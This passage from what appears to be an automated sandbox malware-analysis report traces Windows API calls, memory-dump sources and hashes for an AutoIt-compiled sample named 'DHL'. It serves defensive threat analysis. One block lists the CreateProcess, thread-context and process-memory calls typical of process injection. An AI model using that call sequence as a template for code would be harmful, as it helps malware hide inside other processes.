                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00A0C261
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A0C270
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer$Kill
                                                        • String ID:
                                                        • API String ID: 3500052701-0
                                                        • Opcode ID: 4adff66c872114b0aecfc56406550fd4e5838a49e8fb97926890b812f0c51c45
                                                        • Instruction ID: 044bf9d10a31cb220e5be6ea4cba1d6b280e824f7f744708d4b858e90d2ae3d7
                                                        • Opcode Fuzzy Hash: 4adff66c872114b0aecfc56406550fd4e5838a49e8fb97926890b812f0c51c45
                                                        • Instruction Fuzzy Hash: E631C370904348AFEB22DFA49C95BEBBBFC9F06314F00449EE5DAA7281C7745A85CB51
                                                        APIs
                                                        • CloseHandle.KERNELBASE(00000000,00000000,?,?,009D85CC,?,00A68CC8,0000000C), ref: 009D8704
                                                        • GetLastError.KERNEL32(?,009D85CC,?,00A68CC8,0000000C), ref: 009D870E
                                                        • __dosmaperr.LIBCMT ref: 009D8739
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                        • String ID:
                                                        • API String ID: 2583163307-0
                                                        • Opcode ID: 37b58f49d38fe7cfe8a63b4dea2d07cd270fa3d0b4c42d066a82c802e4580587
                                                        • Instruction ID: 50664025aca0d5365537206781772e6aec9fdfc89dfba8ae559eec6b4fc7e891
                                                        • Opcode Fuzzy Hash: 37b58f49d38fe7cfe8a63b4dea2d07cd270fa3d0b4c42d066a82c802e4580587
                                                        • Instruction Fuzzy Hash: FF014E32A8566066D664A7746C49F7FAB4D8BC1774F3AC11BF8189B3D3DEA1CC818350
                                                        APIs
                                                        • TranslateMessage.USER32(?), ref: 009ADB7B
                                                        • DispatchMessageW.USER32(?), ref: 009ADB89
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009ADB9F
                                                        • Sleep.KERNEL32(0000000A), ref: 009ADBB1
                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 009F1CC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                        • String ID:
                                                        • API String ID: 3288985973-0
                                                        • Opcode ID: b93fdca1a295f2f27597c07000285ada93fb2dd4b7599628e4269277bd1353e3
                                                        • Instruction ID: 106e1d49934c2e64f6fdfaefbd30ee0d05145fe6c9327dfb57ef43a0fffd602a
                                                        • Opcode Fuzzy Hash: b93fdca1a295f2f27597c07000285ada93fb2dd4b7599628e4269277bd1353e3
                                                        • Instruction Fuzzy Hash: 1DF05E306453449BE730CBA48C89FEA73ACEB85320F104918F65A930C0DB3494898B66
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00A12CD4,?,?,?,00000004,00000001), ref: 00A12FF2
                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A13006
                                                        • CloseHandle.KERNEL32(00000000,?,00A12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A1300D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: 0f81027a8d9dddd78ad2e1f7149699a0aa9818f31513ef1b54008f8508e611d9
                                                        • Instruction ID: 8d80571968ba920c00f0e5fe69c86570a492c7ddeea6a34fc1089d295b3bc5f9
                                                        • Opcode Fuzzy Hash: 0f81027a8d9dddd78ad2e1f7149699a0aa9818f31513ef1b54008f8508e611d9
                                                        • Instruction Fuzzy Hash: 90E0CD3228031077D6301795BC0DFCB7E5CD7CAF71F104310F719790D046A0550253A8
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 009B17F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Init_thread_footer
                                                        • String ID: CALL
                                                        • API String ID: 1385522511-4196123274
                                                        • Opcode ID: 544fed680d0c88f3efde43ce715b1ff42003c2bef74e4b963562a3eaa6f9167b
                                                        • Instruction ID: d97956e36a478c0b61622fbaf300fbfda13fa4c043f5e2e54a1034492422e622
                                                        • Opcode Fuzzy Hash: 544fed680d0c88f3efde43ce715b1ff42003c2bef74e4b963562a3eaa6f9167b
                                                        • Instruction Fuzzy Hash: 54229A70608301DFC714DF14C9A0BAABBF6BF85324F64892DF5968B2A1D775E841CB92
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00A16F6B
                                                          • Part of subcall function 009A4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009A4EFD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad_wcslen
                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                        • API String ID: 3312870042-2806939583
                                                        • Opcode ID: dd988eda45c7f1199efe4146f426735f335afee08048d172e652e546a46dbd01
                                                        • Instruction ID: fbf0ab5d4e036cd7842b75382718a9b335ee304be44e341ed6c529a5bb4eb4a7
                                                        • Opcode Fuzzy Hash: dd988eda45c7f1199efe4146f426735f335afee08048d172e652e546a46dbd01
                                                        • Instruction Fuzzy Hash: 3DB15F315082019FCB14EF24C891AAEB7F5BFD5350F14895DF496972A2EB30ED89CB92
                                                        APIs
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 009E2C8C
                                                          • Part of subcall function 009A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009A3A97,?,?,009A2E7F,?,?,?,00000000), ref: 009A3AC2
                                                          • Part of subcall function 009A2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009A2DC4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen
                                                        • String ID: X
                                                        • API String ID: 779396738-3081909835
                                                        • Opcode ID: a439dbc7ef1bb0dbc47b830c58d27480d6b76fa6b52d3d5e622b3d60b31d9bcf
                                                        • Instruction ID: 46a4da197410667ddfecc323298cc8e3256c7fe6547cf39146d03821b90bcbda
                                                        • Opcode Fuzzy Hash: a439dbc7ef1bb0dbc47b830c58d27480d6b76fa6b52d3d5e622b3d60b31d9bcf
                                                        • Instruction Fuzzy Hash: E0219371A002989BDB01DF98CC45BEE7BFCAF89314F108059E405A7241DBB89A898BA1
                                                        APIs
                                                          • Part of subcall function 009D2D74: GetLastError.KERNEL32(?,?,009D5686,009E3CD6,?,00000000,?,009D5B6A,?,?,?,?,?,009CE6D1,?,00A68A48), ref: 009D2D78
                                                          • Part of subcall function 009D2D74: _free.LIBCMT ref: 009D2DAB
                                                          • Part of subcall function 009D2D74: SetLastError.KERNEL32(00000000,?,?,?,?,009CE6D1,?,00A68A48,00000010,009A4F4A,?,?,00000000,009E3CD6), ref: 009D2DEC
                                                          • Part of subcall function 009D2D74: _abort.LIBCMT ref: 009D2DF2
                                                          • Part of subcall function 009DCADA: _abort.LIBCMT ref: 009DCB0C
                                                          • Part of subcall function 009DCADA: _free.LIBCMT ref: 009DCB40
                                                          • Part of subcall function 009DC74F: GetOEMCP.KERNEL32(00000000), ref: 009DC77A
                                                        • _free.LIBCMT ref: 009DCA33
                                                        • _free.LIBCMT ref: 009DCA69
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorLast_abort
                                                        • String ID:
                                                        • API String ID: 2991157371-0
                                                        • Opcode ID: 50720363106b32ea3af4c0790224e55ea007e422289d5dcacc631b9bfae7e8cb
                                                        • Instruction ID: 95d4c5c929ba389f51e1afc0ad4202e7bc736c82be4f23a6812a3db58ce4c715
                                                        • Opcode Fuzzy Hash: 50720363106b32ea3af4c0790224e55ea007e422289d5dcacc631b9bfae7e8cb
                                                        • Instruction Fuzzy Hash: C031C771984109AFDB11DBE8D441B6977F9EF40320F21819BF4049B391EB755D41DB50
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00E14A63
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E14AF9
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E14B1B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1465502144.0000000000E13000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E13000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e13000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                        • Instruction ID: 6558c544e9958bff37d7355f498e6f751ca8294b085a4a400872026845481a12
                                                        • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                        • Instruction Fuzzy Hash: D712BE24E14658C6EB24DF64D8507DEB272FF68300F10A0E9910DEB7A5E77A4F81CB5A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction ID: 3ebc9e963e9afff060cb853ea1f52198d29f2ea1e63f8445ddebd09af1a5b940
                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                        • Instruction Fuzzy Hash: 7B31EC75A00109DBC718CF59D9A09A9FBA5FF89320B2486A5E849CF656D731EDC1CBC0
                                                        APIs
                                                          • Part of subcall function 009A4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,009A4EDD,?,00A71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009A4E9C
                                                          • Part of subcall function 009A4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009A4EAE
                                                          • Part of subcall function 009A4E90: FreeLibrary.KERNEL32(00000000,?,?,009A4EDD,?,00A71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009A4EC0
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009A4EFD
                                                          • Part of subcall function 009A4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,009E3CDE,?,00A71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009A4E62
                                                          • Part of subcall function 009A4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009A4E74
                                                          • Part of subcall function 009A4E59: FreeLibrary.KERNEL32(00000000,?,?,009E3CDE,?,00A71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009A4E87
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressFreeProc
                                                        • String ID:
                                                        • API String ID: 2632591731-0
                                                        • Opcode ID: d72eb60403c233f8be51c3e2b01ca68860f12ccd2f440ecb6df823828c605e60
                                                        • Instruction ID: dc09385c2e370ef592a813a18dc1c1c1bd45aabe1a6c3722852895c2bbbac6e7
                                                        • Opcode Fuzzy Hash: d72eb60403c233f8be51c3e2b01ca68860f12ccd2f440ecb6df823828c605e60
                                                        • Instruction Fuzzy Hash: 4511C132610205AACF14AB60DD06FAD77A5AFC1B10F20882DF552AA1C1EEB4EE459B90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: __wsopen_s
                                                        • String ID:
                                                        • API String ID: 3347428461-0
                                                        • Opcode ID: 7cec80610950ab4612c274eff745d396666053ce6ed878bdea975b4eeb9f85d3
                                                        • Instruction ID: fd640b5cee6d0842e00a3040d8c36ff0889cd41331c877076bf89f867c1a74f2
                                                        • Opcode Fuzzy Hash: 7cec80610950ab4612c274eff745d396666053ce6ed878bdea975b4eeb9f85d3
                                                        • Instruction Fuzzy Hash: 8911187590410AAFCB05DF58E941A9B7BF9EF48314F10805AF808AB312DB31EA11CBA5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                        • Instruction ID: b9f7b3b571f47ee13cc64a1fb72c2240b88840ce07ebc3938c8f0b162bc02dbe
                                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                        • Instruction Fuzzy Hash: AAF0F432D21A1497D6313A798E05F5B339C9FE2330F104B2EF422922D2DB74E80186A7
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,?,00A71444,?,009BFDF5,?,?,009AA976,00000010,00A71440,009A13FC,?,009A13C6,?,009A1129), ref: 009D3852
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 0d8dcaabf08eb680af47db3b4daf8069cd2691cc10635057f915c31277bb6dcb
                                                        • Instruction ID: ad7b3b83d79f6058d01db474f6de9c0221eb61208bc2ef6b3fc020a68a6615b3
                                                        • Opcode Fuzzy Hash: 0d8dcaabf08eb680af47db3b4daf8069cd2691cc10635057f915c31277bb6dcb
                                                        • Instruction Fuzzy Hash: 76E0E53168022456E62166A69C00F9A365EAB827B2F09C126BC1597A80CB50DE01A2E3
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,00A71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009A4F6D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID:
                                                        • API String ID: 3664257935-0
                                                        • Opcode ID: 4d685c4f292edb588784629555a5e1a89b9635d587e6d4d0cad5ea4650d346db
                                                        • Instruction ID: 65ccf0f5d048f3e299e63c4ee60afe82d0420d19ee353f998a43304e33e3bdd1
                                                        • Opcode Fuzzy Hash: 4d685c4f292edb588784629555a5e1a89b9635d587e6d4d0cad5ea4650d346db
                                                        • Instruction Fuzzy Hash: F6F0A071005341CFCB348F60D890812B7E4AF413293209D7EE1DA82610C7B59844DF81
                                                        APIs
                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009A2DC4
                                                          • Part of subcall function 009A6B57: _wcslen.LIBCMT ref: 009A6B6A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: LongNamePath_wcslen
                                                        • String ID:
                                                        • API String ID: 541455249-0
                                                        • Opcode ID: 7f60d2b9dbfaed8d0aa11ff83beee5efc8b335b79fceed6752f5df24d4339ebd
                                                        • Instruction ID: ff8879d7a8132f426e68589c7d8afdfa26e4a9de4b6c0272508cda8094e34f4c
                                                        • Opcode Fuzzy Hash: 7f60d2b9dbfaed8d0aa11ff83beee5efc8b335b79fceed6752f5df24d4339ebd
                                                        • Instruction Fuzzy Hash: 12E0CD726041245BC711E2989C05FDA77DDDFC8790F040071FD09E7248DA70ED808690
                                                        APIs
                                                          • Part of subcall function 009A3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009A3908
                                                          • Part of subcall function 009AD730: GetInputState.USER32 ref: 009AD807
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 009A2B6B
                                                          • Part of subcall function 009A30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 009A314E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                        • String ID:
                                                        • API String ID: 3667716007-0
                                                        • Opcode ID: 81fdc532dc4f345a80a73af064698b3ec59959e15c608c8b15279490a69b391e
                                                        • Instruction ID: d206c2dd21c5e5454b3e9d50b4804b4c8bea97ce7df83f62ad27bd56df83bf98
                                                        • Opcode Fuzzy Hash: 81fdc532dc4f345a80a73af064698b3ec59959e15c608c8b15279490a69b391e
                                                        • Instruction Fuzzy Hash: 41E0866230425407C608BB78AC5667DA7999BD3351F40953EF14B971A2CE24454643D1
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,00000000,?,009E0704,?,?,00000000,?,009E0704,00000000,0000000C), ref: 009E03B7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
